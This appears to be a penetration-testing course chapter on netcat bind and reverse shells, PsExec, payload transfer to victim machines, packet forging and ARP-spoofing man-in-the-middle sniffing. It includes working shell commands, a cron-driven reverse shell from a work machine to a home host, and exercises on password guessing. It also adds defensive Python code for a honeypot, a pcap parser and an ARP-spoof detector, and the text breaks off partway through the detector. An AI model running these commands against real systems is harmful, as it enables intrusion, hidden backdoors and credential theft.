Book:Penetration

From Hacking Defined


Getting Interactive

Netcat

NetCat (NC) is a network tool able to write and read data across TCP and UDP network connections. If you are responsible for network or system security it’s essential that you understand the capabilities of NetCat. NetCat can be used as a port scanner, a backdoor, a port redirector, a port listener and lots of other cool things too. It's not always the best tool for the job, but if I was stranded on an island, I'd take Netcat with me.

Port Scanning With NetCat

A port scanning example command line from Hobbit is nc -v -w 2 -z target 20-30. Netcat will try connecting to every port between 20 and 30 (inclusive) at the target, and will inform you about an FTP server, telnet server, and mailer along the way.


The -z switch tells Netcat not to send any data on a TCP connection (and only very limited probe data on a UDP connection), which makes it a fast scanning mode for seeing which ports the target is listening on.


If you want to slow the scan down, -i inserts a delay between port probes. Netcat can be used for port scanning, but that is not its strength.


The following is a command line example for scanning ports 1-200 on 192.168.1.67.


Command line: nc -v -w 2 -z <target ip> <port range>



From the output we can see that ports 21, 25, 80, 135 and 139 are open.

Banner Grabbing With NetCat

Due to NetCat's simplicity, it can also function as a banner grabber. For example, if we now want to enumerate 192.168.1.67, we can attempt to read the port banners and make a guess at the underlying OS. We will attempt to grab the banners from ports 21, 25 and 80.


Command line: nc -nv <target ip> <port>



We identify (what appears to be) IIS 5.0 on port 80, and ESMTP Mail service version 5.0, which suggests this is Windows 2000.


NetCat as a BackDoor (Connect Shell)

NetCat can act as a basic backdoor on a compromised system.

For this, we need NetCat on both our attacking computer and victim computer (Client / Server relationship). It doesn't really matter how we got nc.exe on the Victim Server, after all this is a NetCat overview…

Command line (on the victim computer): nc.exe -lvvp 10001 -d -e cmd.exe



Here's what that command does:

nc tells Windows to run the nc.exe file with the following arguments:

-l tells netcat to listen on the specified port number

-p specifies a port to listen for a connection on

-d tells NetCat to detach from the console and keep running in the background

-e tells NetCat which program to run once a connection is made (cmd.exe)


Once this command is issued on the Victim Server, we can attempt to connect to it on port 10001, using netcat as our client. The following screenshot illustrates the shell we obtained by connecting to port 10001.


Command line (on the attacking computer): nc.exe -nv <target ip> <port>



NetCat as a Reverse BackDoor (Reverse Shell)

NetCat can also "send" a shell to another instance of a listening NetCat session.

This is especially useful if the attacked machine is behind a firewall or otherwise NATed.

On our attacking computer, we set netcat to listen on port 443 (for example):


Command line (on the attacking computer): nc.exe -lvp <port>



On the victim machine, we instruct netcat to send a shell to the attacker's IP and the port specified above…

Command line (on the victim computer): nc.exe -nv <ip> <port> -d -e cmd.exe



Once the command is executed, we immediately see the victim computer's command prompt appear:



Another example :


Try this on Linux:

On the first console, enter:

$ nc -l -p 5600 -e /bin/bash

and at the second console:

$ nc 10.0.1.1 5600


Now it is as if we were sitting at the first machine's shell: we see the output of every command and can do whatever we want with the server machine. We are connected to it as the root user. This is admittedly very scary and a bit unwise.


Another example:

At the WORK computer, we'll set up a cron job to start at 22:01. Just as in the telnet example it connects to myhome.dyndns.org (our dynamic DNS address) and starts bash.

And at home just at 22:00 or so we start:

$ nc -vv -l -p 80

to begin listening on port 80 for incoming connections.

At 22:01, WORK connects to HOME, starts bash and says 'Master!' Bingo. We are connected to WORK (or vice versa), and WORK is ready to run any command we want.

We can try this on our virtual network (lo:1 and lo:2). To start the listening side (called the client here) waiting for a connection:

$ nc -vv -l -p 80

To make a connection from the server:

$ nc 10.0.1.1 80 -e /bin/bash

It is very simple and efficient, because we only use an outgoing connection to port 80, the most widely used port since it serves web access.


Transferring Files using NetCat

Let's look at other possibilities NetCat can provide. Say we wanted to transfer a file called hack.txt to the IIS server, and for some reason we don't want to (or can't) TFTP the file. We can use Netcat to transfer files from one system to another. To receive a file named hack.txt on the destination system start NetCat on the Victim server with the following command:

Command line (on the victim computer): nc -l -p 1234 >hack.txt



On our source system (the attacking computer) we send a file named hack.txt to the Victim machine with the following command:

Command line (on the attacking computer): nc -nv destination 1234 <hack.txt



Issue a ^C on the source system and you're done. Check the file to be sure it is the same size as the original.


Another example:

At the server console:

$ nc -v -w 30 -p 5600 -l > filename.back

and on the client side:

$ nc -v -w 2 10.0.1.1 5600 < filename

Magically, the file named “filename” is transferred from the client to the server. You can check that they are identical.

The command line uses the new argument -w, which makes Netcat wait (time out) after the given number of seconds. We made that longer on the server side because it is the side most affected by a pause. Another important point is the > and < redirection operators, with which Unix users are very familiar.

On the server we said > filename.back, so any output is directed to this file. As it happens, the output is the file filename which is sent by the client. Think of this as a pipeline: we take a bucket (the file), pour its contents into the pipeline (Netcat's port), and at the other end we fill another bucket from the pipeline.


NetCat as a mini Honeypot

You can use netcat as a simplistic honeypot, where NetCat listens on a port, and displays the traffic arriving at that port. You can even "emulate" basic banners, as shown in the following example – which demonstrates an IIS file traversal attack capture on port 80:
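As an added example (not from the original course material), here is a small Python honeypot in the same spirit: it listens on a loopback port, returns a fake IIS 5.0 banner, logs what the client sent, and flags directory-traversal requests after percent-decoding and normalising the path. The banner text and the sample request in the __main__ block are constructed.

```python
import socket
import threading
from urllib.parse import unquote_to_bytes

# Banner returned to every client, mimicking an IIS 5.0 error response (constructed).
FAKE_BANNER = (
    b"HTTP/1.1 404 Object Not Found\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Content-Length: 0\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)

# Overlong UTF-8 encodings of "/" and "\" that a naive decoder lets through.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}


def classify_request(raw: bytes) -> dict:
    """Parse the request line and decide whether the path is a traversal attempt.

    The path is percent-decoded twice (so %252e%252e becomes ..) and the
    overlong encodings above are normalised before looking for "../" or "..\\".
    """
    line = raw.split(b"\r\n", 1)[0]
    parts = line.split(b" ")
    method = parts[0].decode("ascii", "replace") if parts else ""
    path = parts[1] if len(parts) > 1 else b""
    norm = unquote_to_bytes(unquote_to_bytes(path))
    for enc, plain in OVERLONG.items():
        norm = norm.replace(enc, plain)
    return {
        "method": method,
        "path": path.decode("latin-1"),
        "normalised": norm.decode("latin-1"),
        "traversal": b"../" in norm or b"..\\" in norm,
    }


class MiniHoneypot:
    """Single-shot listener: accept one client, log what it sent, answer with
    the fake banner and close, much like "nc -l -p 80 < banner.txt"."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))      # port 0: let the OS pick a free port
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.log = []                     # one dict per connection handled

    def handle_one(self, timeout: float = 5.0) -> dict:
        self.sock.settimeout(timeout)
        conn, peer = self.sock.accept()
        with conn:
            conn.settimeout(timeout)
            raw = conn.recv(4096)
            entry = classify_request(raw)
            entry["peer"] = "%s:%d" % peer
            entry["raw"] = raw.decode("latin-1")
            self.log.append(entry)
            conn.sendall(FAKE_BANNER)
        return entry

    def close(self):
        self.sock.close()


def probe(request: bytes) -> dict:
    """Run the honeypot on loopback, play the client side against it and return
    the log entry it produced together with the banner the client received."""
    hp = MiniHoneypot()
    worker = threading.Thread(target=hp.handle_one, daemon=True)
    worker.start()
    try:
        with socket.create_connection(("127.0.0.1", hp.port), timeout=5) as client:
            client.sendall(request)
            banner = b""
            while True:                   # read until the honeypot closes
                chunk = client.recv(4096)
                if not chunk:
                    break
                banner += chunk
        worker.join(5)
    finally:
        hp.close()
    return {"entry": hp.log[0], "banner": banner}


if __name__ == "__main__":
    # Constructed sample: a request using the overlong-slash trick to climb out of /scripts/.
    result = probe(b"GET /scripts/..%c0%af..%c0%afplaceholder.txt HTTP/1.0\r\nHost: honeypot\r\n\r\n")
    print("%(peer)s  %(method)s %(path)s -> %(normalised)s  traversal=%(traversal)s" % result["entry"])
```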



Remote Execution with NetCat

NetCat can also be used to execute files on a remote machine. This can be done by passing commands to the remote cmd.exe.

Command line (on the victim computer): nc -lvp 3324 -e cmd


We can then execute commands (or even a batch file) by piping the command into the remote netcat shell:

Command line (on the attacking computer): type command.bat | nc -w 3 <target ip> <port>



In this example, calc.exe is executed on the victim system, as shown in the next screenshot:



Netcat Exercises

Duration: 25 mins

Goals:

1. Experiment with a partner using all of netcat's features: port scanning, banner grabbing, bind / reverse shells, file transfer, etc. It is vital you get a good understanding of Netcat.

What is the difference between a bind shell and a reverse shell? What significance does this have from an organisational perspective?

2. Look up and experiment with tools such as SBD and RRS.

Solution: To be demonstrated by Instructor

RPC Enumeration and remote code execution

Remote Procedure Call (RPC) is a protocol that allows a computer program running on one host to cause code to be executed on another host without the programmer needing to explicitly code for this. When the code in question is written using object-oriented principles, RPC is sometimes referred to as remote invocation or remote method invocation.

PSExec

PsExec is a command-line tool that lets you execute processes on remote systems and redirect console applications' output to the local system so that these applications appear to be running locally. You can download PsExec for free from the Sysinternals Web site (http://www.sysinternals.com/)

Command line Options

C:\tools>psexec 
PsExec v1.61 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com

PsExec executes a program on a remote system, where remotely executed console
applications execute interactively.

Usage: psexec [\\computer[,computer2[,...] | @file][-u user [-p psswd]][-n s]
[-s|-e][-i][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
    -a         Separate processors on which the application can run with
               commas where 1 is the lowest numbered CPU. For example,
               to run the application on CPU 2 and CPU 4, enter:
               "-a 2,4"
    -c         Copy the specified program to the remote system for
               execution. If you omit this option the application
               must be in the system path on the remote system.
    -d         Don't wait for process to terminate (non-interactive).
    -e         Loads the specified account's profile.
    -f         Copy the specified program even if the file already
               exists on the remote system.
    -i         Run the program so that it interacts with the desktop on the
               remote system.
    -n         Specifies timeout in seconds connecting to remote computers.
    -p         Specifies optional password for user name. If you omit this
               you will be prompted to enter a hidden password.
    -s         Run the remote process in the System account.
    -u         Specifies optional user name for login to remote
               computer.
    -v         Copy the specified file only if it has a higher version number
               or is newer on than the one on the remote system.
    -w         Set the working directory of the process (relative to
               remote computer).
    -priority  Specifies -low, -belownormal, -abovenormal, -high or
               -realtime to run the process at a different priority.
    computer   Direct PsExec to run the application on the remote
               computer or computers specified. If you omit the computer
               name PsExec runs the application on the local system,
               and if you specify a wildcard (\\*), PsExec runs the
               command on all computers in the current domain.
    @file      PsExec will execute the command on each of the computers listed
               in the file.
    program    Name of application to execute.
    arguments  Arguments to pass (note that file paths must be
               absolute paths on the target system).

You can enclose applications that have spaces in their name with
quotation marks e.g. psexec \\marklap "c:\long name app.exe".
Input is only passed to the remote system when you press the enter
key, and typing Ctrl-C terminates the remote process.

If you omit a user name the process will run in the context of your
account on the remote system, but will not have access to network
resources (because it is impersonating). Specify a valid user name
in the Domain\User syntax if the remote process requires access
to network resources or to run in a different account. Note that
the password is transmitted in clear text to the remote system. 

Error codes returned by PsExec are specific to the applications you
execute, not PsExec.


C:\tools>

PSExec Usage

PsExec's ability to run processes remotely with no manual installation of software on the remote system makes deployment easy. However, if PsExec were only able to launch a program on a remote system, its usefulness would be limited. PsExec's ability to redirect the input and output of console applications is what makes the tool a versatile systems management utility.

For example, PsExec lets Ipconfig, the Windows utility that displays the TCP/IP configuration for a system's network adapters, show a remote system's configuration. A sample command for that use is

psexec \\<remote ip> ipconfig

where <remote ip> is the name or IP address of the system you want to query. You'll see Ipconfig's output as if you had run Ipconfig on the local machine.

If you don't specify the path of the program you want to execute, PsExec looks in the \windows\system32 directory of the remote system. If you know that the program isn't in that directory, enter its full path on the remote system; if it's an executable on the local system that you want to execute on the remote system, specify the -c switch and the file's local path. The -c switch directs PsExec to copy the specified executable to the remote system for execution and delete the executable from the remote system when the program has finished running.

An even more powerful use of PsExec's console-redirection capability is to run a command prompt on a remote system as if the command prompt were running locally. This use of PsExec is similar to running a Telnet client on the local machine and connecting to a Telnet service on the remote machine, but you don't need to have the Telnet service, or any other special service, running on the remote system. Simply execute the command:

psexec \\<remote ip> command

For example, the command

psexec \\<remote ip> cmd /c ver

displays the Windows version number of the remote system on the local machine's console.



PSExec Advanced Usage

Another popular use of PsExec is to deploy hotfixes or other patches that support a noninteractive interface across your network. To make this task even easier, PsExec takes multiple computer names, the name of a text file containing a list of computer names, or the special name of \\* that results in an enumeration of all the computers in the current domain. For instance, to execute the Microsoft MyDoom removal tool on computers named Remote and Remote1 and log the exit status of the cleanup to a file, you could use the command

psexec \\remote,remote1 -c trojan.exe -s 2> results.log

Upon exit, a process specifies an integer that the process's parent process can read. Programs often use the exit code to report the success or failure of their execution. Whenever a process executed with PsExec is completed, PsExec displays the process's exit code and returns the exit code as its own exit code. You should test a program's behavior or check its documentation to determine what that program's specific error codes mean, but an exit code of 0 typically means success. The -s switch specifies that PsExec should execute the command under the System account. I'll discuss this option more in a moment.

PSExec Exercise

Duration: 25 mins

Goals:

1. Use psexec to take control of a Windows 2000 lab computer, assuming the username is Administrator and the password is lab.

2. Write a batch file which will attempt to guess the password (assuming it has been changed from lab) of a Windows 2000 computer, and gain control over it using psexec.

3. Does psexec work on Windows XP? Under what conditions? Why does XP behave this way?

4. Class death-match. The instructor will give further details.

Solution: To be demonstrated by Instructor

Other Remote Control Techniques

Dameware

DameWare NT Utilities is an enterprise system management tool for Windows NT/2000/XP, providing an integrated collection of Microsoft Windows NT/2000 administration utilities. The software has all the most frequently used Windows NT/2000 administration tools in one programme and incorporates a centralised interface for remote management of Windows NT/2000 Server and Workstation machines.

VNC

VNC has a wide range of applications including system administration, IT support and helpdesks. It can also be used to support the mobile user, both for hot desking within the enterprise and also to provide remote access at home, or on the road. The system allows several connections to the same desktop, providing an invaluable tool for collaborative or shared working in the workplace or classroom. Computer support within the geographically spread family is an ever popular use.

  • VNC Server Settings


  • VNC Client


  • VNC Http client

Radmin

Remote Administrator (Radmin) is a secure remote control software that enables you to work on a remote computer as if you were sitting in front of it. This program is the ideal remote access solution. You can access the same computer from multiple places and use advanced file transfer, remote shutdown, Telnet, OS-integrated NT security system support and other features.

Transferring Files

Now that we have remote access to a machine, how can we transfer our files to the victim?

TFTP

We can use the default TFTP client found on Windows. This requires us to set up a TFTP server in order to serve our malicious files to the victim.



d:\tools>tftp -i 192.168.1.152 get nc.exe
Transfer successful: 59392 bytes in 1 second, 59392 bytes/s

d:\tools>dir nc.exe
 Volume in drive D has no label.
 Volume Serial Number is 189A-E380

Directory of d:\tools

09/29/2005  12:49 PM            59,392 nc.exe
               1 File(s)         59,392 bytes
               0 Dir(s)  20,785,954,816 bytes free

d:\tools>

FTP

We can use the default FTP client found on Windows. This requires us to set up an FTP server in order to serve our malicious files to the victim. However, there's a small glitch with this method, as we will soon see.



Interactive Shell vs Non Interactive Shell

Try establishing an FTP session from your command prompt:

d:\tools>ftp ftp.netvision.net.il
Connected to ftp.netvision.net.il.
220 ftp.netvision.net.il FTP server ready
User (ftp.netvision.net.il:(none)): anonymous
331 Anonymous login ok, send your complete email address as your password.
Password: test@test.com
230 Anonymous access granted, restrictions apply.
ftp> bye
221 Goodbye.

d:\tools>

This should work as expected, no surprises.


Try the same using a *remote* shell (one obtained via netcat or a remote exploit). Does ftp work?

Overcoming Non Interactive Shell Problems

This is one example which can be used for FTP file transfers. Notice how each command is non-interactive, i.e., it does not require further user input.

d:\tools>echo open 192.168.1.152 21 >ftp.txt

d:\tools>echo evil >> ftp.txt

d:\tools>echo attacker >> ftp.txt

d:\tools>echo bin >> ftp.txt

d:\tools>echo get nc.exe >> ftp.txt

d:\tools>echo bye >> ftp.txt

d:\tools>ftp -s:ftp.txt
ftp> open 192.168.1.152 21
Connected to 192.168.1.152.
220-GuildFTPd FTP Server (c) 1997-2002
220-Version 0.999.13
220 Please enter your name:
User (192.168.1.152:(none)):
331 User name okay, Need password.
230 User logged in.
ftp> bin
200 Type set to I.
ftp> get nc.exe
200 PORT command successful.
150 Opening binary mode data connection for /nc.exe (61440 bytes).
226 Transfer complete. 61440 bytes in 0 sec. (0.00 Kb/s).
ftp: 61440 bytes received in 0.02Seconds 3072.00Kbytes/sec.
ftp> bye
221 Goodbye.  Control connection closed.

d:\tools>dir nc.exe
Volume in drive D has no label.
Volume Serial Number is 189A-E380

Directory of d:\tools

09/29/2005  01:23 PM            61,440 nc.exe
               1 File(s)         61,440 bytes
               0 Dir(s)  19,291,262,976 bytes free

d:\tools>


Inline File Transfer

Another devious way of getting files over to the victim is by using inline file transfer.

The 2 previous methods involved opening external connections (FTP / TFTP) from the victim machine. The Inline Transfer method transfers the file *within* the same session as the shell.

A good example is the Windows "debug" command. Imagine that after obtaining a shell, we "write" a file (using echo commands) and then turn it back into a binary using debug.

No doubt "writing" a file in hex from the command line is a daunting task... Specialised tools (such as exe2bat) have been made to automate the conversion of a binary into a list of echo commands.


C:\tools>exe2bat.exe nc.exe nc.bat
||exe2batch||

Usage : exe2bat.exe inputfile outputfile
e.g.  : exe2bat.exe dcmd.exe command.txt

Finished: nc.exe > nc.bat

C:\tools>


Check the Output (http://www.hackingdefined.com/downloads/ncbat.rar) file.


Traffic Interception and Analysis

Capturing Packets

Packet sniffers (also known as Network Analyzers or Ethernet Sniffers) are software programs which can see and/or log traffic passing over a network or part of a network. As data streams travel back and forth over the network, the program captures each packet and eventually decodes and analyzes its content according to the appropriate RFC or other specifications.

Depending on the network structure (hub or switch), one can sniff all or only part of the traffic from a single machine within the network; however, there are methods to get around the traffic narrowing done by switches and gain access to traffic from other systems on the network (ARP spoofing is one of them).

For network monitoring purposes it may also be desirable to monitor all data packets in a LAN which can be done using a network switch with a so-called monitoring port (it mirrors all packets passing through all ports of the switch).


Ethereal

Ethereal is a protocol analyzer, or "packet sniffer" software, used for network troubleshooting, analysis, software / protocol development, and education. It has all of the standard features of a protocol analyzer.

The functionality Ethereal provides is very similar to tcpdump (cf. below), but it adds a GUI frontend and many more information sorting and filtering options. It allows the user to see all traffic being passed over the network (usually an Ethernet network, but support is being added for others) by putting the network card into promiscuous mode.

Ethereal is released under an open source license, and it runs on most Unix and Unix-compatible systems, including Linux, Solaris, FreeBSD, NetBSD, OpenBSD, and Mac OS X, and also on Microsoft Windows.



Analysing Traffic Exercise

Getting a thorough understanding of a packet sniffer is vital for both hacker and administrator. Generally, it does not matter which sniffer you use, as long as you know how to use it well.

Duration: 20 mins

PreRequisites: http://www.hackingdefined.com/downloads/dump1.cap

Goals:

1. Examine Capture Dump 1 (open it with Ethereal). Describe in detail the first 12 packets. Can you account for each and every one (in detail)? Who is the client? Who is the server? What IP addresses are involved? What can you deduce about the network layout? What protocols are in use?

Solution: To be demonstrated by Instructor

Other Sniffers

TCPDump

Tcpdump prints out the headers of packets on a network interface that match the boolean expression. It can also be run with the -w flag, which causes it to save the packet data to a file for later analysis, and/or with the -r flag, which causes it to read from a saved packet file rather than from a network interface.

In all cases, only packets that match the expression will be processed by tcpdump.

Commview

CommView is a powerful network monitor and analyzer designed for LAN administrators, security professionals, network programmers, home users…virtually anyone who wants a full picture of the traffic flowing through a PC or LAN segment.


Traffic Interception and Manipulation

Building your own Packets

Editing packets manually can be useful in several situations...

We can create our own packets using packet generators such as packETH, or manually edit existing packets to suit our needs.

Playing with ICMP Excercise

Duration: 20 mins

PreRequisites: Instructor Demo

Goals:

1. Capture an ICMP Request packet, and save that single packet to a pcap file. Edit the packet (don't forget to "shave off" the pcap header) so that you will be able to replay this packet with file2cable.

2. Manipulate the packet so that the ICMP request to a 3rd party computer will appear to come from your neighbour. Check for an ICMP reply at your neighbour's computer with a sniffer.

Solution: To be demonstrated by Instructor
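An added example, not part of the original exercise material: a Python parser that shaves the libpcap global and record headers off a capture and decodes the resulting Ethernet/IPv4/ICMP frame, verifying both checksums so that an edited packet can be checked before it is replayed (a packet edited without recomputing its checksums is silently dropped by the receiver). The capture it parses is constructed in build_sample_pcap(); the addresses and MACs in it are made up.

```python
import struct

# libpcap magic numbers as they appear when the first four bytes are read little-endian.
_MAGIC_LE_US, _MAGIC_LE_NS = 0xA1B2C3D4, 0xA1B23C4D   # file written little-endian
_MAGIC_BE_US, _MAGIC_BE_NS = 0xD4C3B2A1, 0x4D3CB2A1   # file written big-endian


def parse_pcap(blob: bytes):
    """Split a classic libpcap file into (link_type, [(timestamp, frame), ...]).

    The 24-byte global header and each 16-byte record header are shaved off;
    only the bytes that were on the wire are returned for each record. Both
    byte orders and both timestamp resolutions (us / ns) are handled.
    """
    if len(blob) < 24:
        raise ValueError("truncated global header")
    magic = struct.unpack("<I", blob[:4])[0]
    if magic in (_MAGIC_LE_US, _MAGIC_LE_NS):
        order = "<"
    elif magic in (_MAGIC_BE_US, _MAGIC_BE_NS):
        order = ">"
    else:
        raise ValueError("not a libpcap file (magic %08x)" % magic)
    nanos = magic in (_MAGIC_LE_NS, _MAGIC_BE_NS)
    _major, _minor, _tz, _sig, _snaplen, link_type = struct.unpack(order + "HHiIII", blob[4:24])
    frames, off = [], 24
    while off < len(blob):
        if off + 16 > len(blob):
            raise ValueError("truncated record header at offset %d" % off)
        ts_sec, ts_frac, incl_len, _orig_len = struct.unpack(order + "IIII", blob[off:off + 16])
        off += 16
        if off + incl_len > len(blob):
            raise ValueError("truncated packet data at offset %d" % off)
        frames.append((ts_sec + ts_frac / (1e9 if nanos else 1e6), blob[off:off + incl_len]))
        off += incl_len
    return link_type, frames


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum. Run over a header whose checksum field is
    already filled in correctly, the result is 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def decode_icmp_frame(frame: bytes) -> dict:
    """Walk Ethernet -> IPv4 -> ICMP and report the fields worth checking on a
    packet you have edited, including whether both checksums still verify."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 1:
        raise ValueError("IP protocol %d is not ICMP" % ip[9])
    icmp = ip[ihl:total_len]          # drop any Ethernet trailer padding
    return {
        "src": ".".join(map(str, ip[12:16])),
        "dst": ".".join(map(str, ip[16:20])),
        "ttl": ip[8],
        "ip_checksum_ok": inet_checksum(ip[:ihl]) == 0,
        "icmp_type": icmp[0],           # 8 = echo request, 0 = echo reply
        "icmp_code": icmp[1],
        "icmp_checksum_ok": inet_checksum(icmp) == 0,
    }


def build_sample_pcap(order: str = "<") -> bytes:
    """Constructed test input: a libpcap file holding one ICMP echo request
    (10.0.0.5 -> 10.0.0.1) with correct IP and ICMP checksums."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1) + b"abcdefgh"
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 1, 0, 64, 1, 0,
                     bytes([10, 0, 0, 5]), bytes([10, 0, 0, 1]))
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    frame = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00" + ip + icmp   # made-up MACs
    global_hdr = struct.pack(order + "IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    record_hdr = struct.pack(order + "IIII", 1_700_000_000, 500_000, len(frame), len(frame))
    return global_hdr + record_hdr + frame


if __name__ == "__main__":
    link, frames = parse_pcap(build_sample_pcap())
    for ts, frame in frames:
        print("link %d  t=%.6f  %d bytes on the wire" % (link, ts, len(frame)))
        print(decode_icmp_frame(frame))
```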

ARP spoofing

ARP spoofing is essentially a simple attack, where an attacker sends spoofed ARP responses to a victim computer. The unsuspecting victim computer happily accepts the forged ARP replies and adds them to its ARP cache. At this stage, with the victim's ARP cache "poisoned", traffic redirection can take place, because IP-to-MAC resolution is first checked against the ARP cache.

Arp Spoofing Example

Remember the NMAP IP spoofing option? By combining NMAP with ARP spoofing, we can poison our victim computer's ARP cache into thinking that 192.168.1.222 is us, thereby receiving the packets sent to the spoofed address:



The result of arpspoof can be seen by giving the command arp -a on the victim machine:



This time, due to the fact that we've poisoned the arp cache on the victim machine, we *do* get the scan replies, while the IDS logs a nonexistent IP address (192.168.1.222).


Command line: nmap -sS -P0 -e eth0 -S <fake source ip address> <target ip address>



The output from the IDS clearly shows that the *real* source IP address is not revealed:



This attack will only work on a local LAN, as ARP (by design) is not routable.

ARP Spoofing MITM Attacks

Suppose you wanted to sniff a computer's traffic (on a switched LAN) for passwords. Using a tool such as ARPSpoof, you can make your attacking computer pose as the "default gateway", thus performing a "Man In The Middle" attack. For such attacks, IP forwarding must be enabled on your computer so that communication between the computers keeps working.

Imagine the following scenario:

(MAC addresses have been shortened for brevity)



The attacker would poison both the Victim and Router, creating the following effect:



ARP Spoofing - MITM the Hard Way

In order that we grasp the fundamentals of ARP Spoofing, we'll start with a "manual" attack on a victim computer. We will be using the tools ARPSpoof and Dsniff.

Dsniff Basics

Dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.


dsniff (the tool, not the package) is a simple password sniffer. It handles FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, and Oracle SQL*Net auth info.

Dsniff goes beyond most sniffers in that it minimally parses each application protocol, only saving the "interesting" bits. (passwords)



For more information about the Dsniff package, check out http://www.datanerds.net/~mike/dsniff.html

IP Forwarding

Don't forget to enable IP forwarding on your attacking host so that the traffic passes through your host. Otherwise the victim will lose connectivity.

To enable IP forwarding temporarily (until the next reboot):

echo 1 > /proc/sys/net/ipv4/ip_forward

To enable permanently, edit /etc/sysconfig/network and change or add the following line:

FORWARD_IPV4 = YES

ARPSpoof

Arpspoof is a tool used to fool a computer into believing that the MAC address of the host it is talking to has changed. When run, it floods the victim with fake ARP replies to force the victim computer to change its IP-to-MAC address association. When this works, the victim computer changes its MAC address entry to the attacker's MAC, and all the traffic is redirected to the attacker.

Let's test this out. In the following scenario, we will intercept traffic going to and from the victim machine (192.168.1.151) and the default gateway (192.168.1.138).

1. We ping the victim and the gateway in order to populate the ARP Cache with valid responses.

2. We start the attack, poisoning the victim's ARP Cache with our MAC address:

Command line: arpspoof -t <victim address> <gateway address>



3. In a separate prompt we poison the gateway's ARP cache in the same way:



4. Assuming we have enabled IP forwarding on our machine, we are now redirecting traffic from the attacked machine to our machine, and onwards to the default gateway. This is what the victim's ARP cache looks like before and after the attack:

Before:



After:



Now we can watch all the traffic between the victim host and the outside network going through the attacking machine via any Network Analyzer (such as Dsniff).



All passwords being transmitted from the victim host to the gateway (and on to the internet) will pass via your attacking machine, and can be sniffed.


Once you control the victim's traffic, you can experiment with countless "Man in the Middle" attacks, including SMB and Kerberos sniffing and cracking, Traffic manipulation, etc.
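An added detection-side example (not from the original material): a Python ARP watcher that consumes ARP replies as a sniffer on the victim's segment would see them and reports the three symptoms of the attack above (an IP changing its MAC, one MAC claiming both victim and gateway, and the same reply being repeated), plus a helper that diffs two arp -a snapshots like the "before" and "after" caches shown earlier. The victim and gateway IPs are the ones from the walkthrough; the MAC addresses and timings in SAMPLE_REPLIES are constructed.

```python
from collections import defaultdict, deque


def diff_arp_tables(before: dict, after: dict) -> dict:
    """Compare two "arp -a" snapshots ({ip: mac}) and return the IPs whose MAC
    changed, mapped to (old_mac, new_mac)."""
    return {ip: (before[ip], after[ip]) for ip in before
            if ip in after and before[ip].lower() != after[ip].lower()}


class ArpWatch:
    """Passive detector fed with the ARP replies seen on the segment.

    Alert kinds:
      mac-changed          an IP that was bound to one MAC is now claimed by another
      mac-claims-multiple  one MAC answers for several IPs (posing as victim and gateway)
      reply-flood          the same (ip, mac) pair is advertised repeatedly in a short
                           window, as arpspoof does to keep the cache poisoned
    Unsolicited replies (no matching request) are not tracked here; pairing
    requests with replies would add a fourth, stronger indicator.
    """

    def __init__(self, gateway_ip: str, window_s: float = 10.0, flood_threshold: int = 3):
        self.gateway_ip = gateway_ip
        self.window_s = window_s
        self.flood_threshold = flood_threshold
        self.bindings = {}                  # ip -> mac learned from the first reply
        self.ips_by_mac = defaultdict(set)  # mac -> IPs it has claimed so far
        self.recent = defaultdict(deque)    # (ip, mac) -> times of recent replies

    def observe(self, t: float, sender_ip: str, sender_mac: str) -> list:
        mac = sender_mac.lower()
        alerts = []
        prev = self.bindings.get(sender_ip)
        if prev is not None and prev != mac:
            role = "gateway" if sender_ip == self.gateway_ip else "host"
            alerts.append({"t": t, "kind": "mac-changed", "ip": sender_ip,
                           "role": role, "old": prev, "new": mac})
        self.bindings[sender_ip] = mac
        if sender_ip not in self.ips_by_mac[mac]:
            self.ips_by_mac[mac].add(sender_ip)
            if len(self.ips_by_mac[mac]) > 1:     # alert once per newly claimed IP
                alerts.append({"t": t, "kind": "mac-claims-multiple", "mac": mac,
                               "ips": sorted(self.ips_by_mac[mac])})
        times = self.recent[(sender_ip, mac)]
        times.append(t)
        while times and t - times[0] > self.window_s:
            times.popleft()
        if len(times) == self.flood_threshold:    # fire when the threshold is crossed
            alerts.append({"t": t, "kind": "reply-flood", "ip": sender_ip, "mac": mac,
                           "count": len(times), "window_s": self.window_s})
        return alerts

    def run(self, replies) -> list:
        """Feed (time, sender_ip, sender_mac) tuples and collect all alerts."""
        out = []
        for t, ip, mac in replies:
            out.extend(self.observe(t, ip, mac))
        return out


# Constructed sample: ARP replies as a sniffer on the victim's segment would see
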